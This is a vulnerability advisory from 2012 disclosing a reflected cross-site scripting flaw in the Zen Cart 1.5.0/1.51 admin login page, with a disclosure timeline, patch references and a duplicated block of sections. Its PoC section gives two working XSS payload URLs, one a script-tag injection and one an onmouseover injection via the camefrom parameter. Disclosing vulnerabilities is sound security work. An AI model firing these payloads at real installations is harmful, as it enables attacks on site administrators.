SSCHADV2012-021 - Zen cart v1.5.0 & v1.51 Cross-Site Scripting vulnerability
Advisory:
|
Zen cart v1.5.0 & v1.51 Cross-Site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2012-021
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Zen-cart-v150-12302011
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
Zen cart v1.5.0 & v1.51 are prone to a Cross-Site Scripting vulnerability
======================
PoC-Exploit
======================
http://[target]/zen-cart/admin1/login.php?‘"</script><script>alert(/xss/)</script>
http://[target]/zen-cart/admin1/login.php?camefrom=" onmouseover=alert(/xss/) "
======================
Solution
======================
A patch is available, see References.
======================
Disclosure Timeline
======================
08-Sep-2012 – informed Secunia via SVCRP
08-Oct-2012 – patch released
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.zen-cart.com/showthread.php?200947-XSS-Flaw-Patch
http://secunia.com/advisories/50574/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-021.txt
PoC-Exploit
======================
http://[target]/zen-cart/admin1/login.php?‘"</script><script>alert(/xss/)</script>
http://[target]/zen-cart/admin1/login.php?camefrom=" onmouseover=alert(/xss/) "
======================
Solution
======================
A patch is available, see References.
======================
Disclosure Timeline
======================
08-Sep-2012 – informed Secunia via SVCRP
08-Oct-2012 – patch released
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.zen-cart.com/showthread.php?200947-XSS-Flaw-Patch
http://secunia.com/advisories/50574/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-021.txt
Comments
Display comments as Linear | Threaded